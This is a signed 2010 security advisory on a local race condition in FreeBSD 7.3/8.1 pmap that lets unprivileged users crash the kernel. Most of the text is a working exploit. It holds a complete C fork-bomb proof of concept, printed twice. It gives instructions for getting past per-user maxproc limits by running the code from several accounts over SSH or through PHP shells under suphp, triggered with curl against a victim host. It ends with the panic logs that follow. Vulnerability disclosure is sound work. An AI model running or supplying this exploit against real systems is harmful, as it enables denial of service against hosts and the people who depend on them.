-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ FreeBSD 8.1/7.3 vm.pmap kernel local race condition ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
http://lu.cxib.net
Date:
- - Dis.: 09.07.2010
- - Pub.: 07.09.2010
Affected Software (verified):
- - FreeBSD 7.3/8.1
Original URL:
http://securityreason.com/achievement_securityalert/88
- --- 0.Description ---
maxproc
This is the maximum number of processes a user may be running. This
includes foreground and background processes alike. For obvious reasons,
this may not be larger than the system limit specified by the
kern.maxproc sysctl(8). Also note that setting this too small may hinder
a user's productivity: it is often useful to be logged in multiple times
or execute pipelines. Some tasks, such as compiling a large program,
also spawn multiple processes (e.g., make(1), cc(1), and other
intermediate preprocessors).
vm.pmap.shpgperproc
- --- 1. FreeBSD 8.1/7.3 kernel local race condition ---
Race condition in pmap, allows attackers to denial of service freebsd
kernel. Creating a lot of process by fork() (~ kern.maxproc), it's
possible to denial kernel.
To bypass the MAXPROC from login.conf, we can use a few users to run PoC
in this same time, to reach kern.maxproc. suphp can be very usefully.
We need choose vector attack. When we have access to few users via ssh,
use openssh.
Example attack by ssh
POC:
/*
FreeBSD 7.3/8.1 pmap race condition PoC
Credit: Maksymilian Arciemowicz
*/
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
void newproc(){
again:
fork();
sleep(3600*24);
goto again;
}
void runfork(){
pid_t adr;
if(0!=(adr=fork())) printf("fork not zero\n");
else {
printf("fork zero\n");
newproc();
}
}
int main(){
int secdel=5;
int dev;
// clock with (int)secdel secound frequency
while(1){
printf("sleep %i sec\n",secdel);
sleep(secdel);
printf("weak up\n");
// create 512 processes
dev=512;
while(dev--)
runfork();
}
return 0;
}
127# ssh cx () 0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81
and in the same time (symetric)
127# ssh max () 0
Password:
$ gcc -o poc81 poc81.c
$ ./poc81
Result:
Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please
see tuning(7) and login.conf(5).
Jul 29 08:42:01 127 last message repeated 31 times
Jul 29 08:44:02 127 last message repeated 119 times
Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see
tuning(7) and login.conf(5).
Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase
vm.pmap.shpgperproc
Jul 29 08:50:27 127 kernel: cpuid = 0
Jul 29 08:50:27 127 kernel: Uptime: 13m23s
Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key
on the console to abort
Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
Jul 29 08:50:27 127 kernel: --> or switch off the system now.
Jul 29 08:50:27 127 kernel: Rebooting...
Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.
But when we have php-shell from several uid`s, we can also use suphp.
Example attack by suphp:
127# cat cxuser.php
<?php
system("./def");
?>
127# ls -la
total 16
drwxr-xr-x 2 root wheel 512 Jul 29 08:43 .
drwxr-xr-x 4 root wheel 512 Jul 29 08:38 ..
- -rw-r--r-- 1 cx cx 27 Jul 29 08:38 cxuser.php
- -rwxr-xr-x 1 cx cx 7220 Jul 29 08:38 def
- -rw-r--r-- 1 max max 27 Jul 29 08:43 maxuser.php
now remote request to cxuser.php and maxuser.php
curl http://victim/hack/cxuser.php
and in the same time
curl http://victim/hack/maxuser.php
result:
Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001,
please see tuning(7) and login.conf(5).
Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase
vm.pmap.shpgperproc
Jul 29 08:48:30 localhost kernel: cpuid = 0
Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
Jul 29 08:48:30 localhost kernel:
Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press
a key on the console to abort
Jul 29 08:48:30 localhost kernel: Rebooting...
Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD
Project.
- ---debug log - cron (uid=0)---
...
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
panic: get_pv_entry: increase vm.pmap.shpgperproc
cpuid = 0
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
...
KDB: enter: panic
[ thread pid 7417 tid 106207 ]
Stopped at kdb_enter+0x3a: movl $0,kdb_why
db> ps
pid ppid pgrp uid state wmesg wchan cmd
7417 880 880 0 RL CPU 0 cron
7416 880 880 0 RL cron
7415 7413 880 0 RVL cron
7414 7412 7412 0 R sh
7413 880 880 0 D ppwait 0xc8118548 cron
7412 7411 7412 0 Ss wait 0xc8118aa0 sh
7411 880 880 0 S piperd 0xc4d7eab8 cron
7410 5367 1294 1001 RL+ def
7409 5366 1294 1001 RL+ def
7408 5365 1294 1001 RL+ def
7407 5364 1294 1001 RL+ def
7406 5363 1294 1001 RL+ def
7405 5362 1294 1001 RL+ def
7404 5361 1294 1001 RL+ def
...
db> trace
Tracing pid 7417 tid 106207 td 0xc8113280
kdb_enter(c0ccfb5c,c0ccfb5c,c0d0a037,e7f9da38,0,...) at kdb_enter+0x3a
panic(c0d0a037,10,c0d09b5f,88c,0,...) at panic+0x136
get_pv_entry(c80bcce0,0,c0d09b5f,ccd,c0fabd00,...) at get_pv entry+0x252
pmap_enter(c80bcce0,a0f7000,1,c2478138,5,...) at pmap_enter+0x34c
vm_fault(c8Obcc30,a0f7000,1,0,a0f711b,...) at vm_fault+0x1b02
trap_pfault(5,0,c0dOblle,c0cd1707,c8118550,...) at trap_pfault+0xl0d
trap(e7f9dd28) at trap+0x2d0
calltrap() at calltrap+0x6
- --- trap 0xc, eip = 0xa0f711b, esp = 0xbfbfec8c, ebp = 0xbfbfecc8 --
db> show pcpu
cpuid = 0
dynamic pcpu = 0x627d00
curthread = 0xc8113280: pid 7417 "cron"
curpcb = 0xe7f9dd80
fpcurthread = none
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
APIC ID = 0
currentldt = 0x50
spin locks held:
...
db> show registers
cs 0x20
ds 0xc0cc0028
es 0xc0d00028
fs 0xc08f0008 free_unr+0x188
ss 0x28
eax 0xc0ccfb5c
ecx 0xc148792f
edx 0
ebx 0xl
esp 0xe7f9d9f8
ebp 0xe7f9da00
esi 0x100
edi 0xc8113280
eip 0xc08de44a kdb_enter+0x3a
efl 0x286
kdb_enter+0x3a: movl $0,kdb_why
...
db> show page
cnt.v_free_count: 104827
cnt.v_cache_count: 11
cnt.v_inactive_count: 3369
cnt.v_active_count: 44397
cnt.v_wire_count: 58250
cnt.v_free_reserved: 324
cnt.v_free_min: 1377
cnt.v_free_target: 5832
cnt.v_cache_min: 5832
cnt.v_inactive_target: 8748
...
- ---debug log - crash in cron (uid=0)---
- ---debug log - crash in def (uid=1001)---
db> ps
...
6774 4777 2009 1001 RL+ def
6773 4777 2009 1001 RL+ CPU 0 def
6772 4777 2009 1001 RL+ def
...
db> show pcpu
cpuid = 0
dynamic pcpu = 0x627d00
curthread = Oxc8c34c80: pid 6773 "def"
curpcb = Oxe97f6d80
fpcurthread = none
idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
APIC ID = 0
currentldt = 0x50
spin locks held:
...
- ---debug log - crash in def (uid=1001)---
- --- 2. PoC def2.c ---
/*
FreeBSD 7.3/8.1 pmap race condition PoC
Credit: Maksymilian Arciemowicz
*/
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
void newproc(){
again:
fork();
sleep(3600*24);
goto again;
}
void runfork(){
pid_t adr;
if(0!=(adr=fork())) printf("fork not zero\n");
else {
printf("fork zero\n");
newproc();
}
}
int main(){
int secdel=5;
int dev;
// clock with (int)secdel secound frequency
while(1){
printf("sleep %i sec\n",secdel);
sleep(secdel);
printf("weak up\n");
// create 512 processes
dev=512;
while(dev--)
runfork();
}
return 0;
}
- --- 3. Greets ---
sp3x, Infospec, Adam Zabrocki 'pi3'
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- - cxib {a\./t] securityreason [d=t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://lu.cxib.net/
- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
<cxib () securityreason com>
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkyGff0ACgkQpiCeOKaYa9b0QQCfbY7yNcbUa7TDOTYxzgN7ya0y
yQMAn079PHiu7Uy5WU3gvsJnvzZ0M8qO
=D5mh
-----END PGP SIGNATURE-----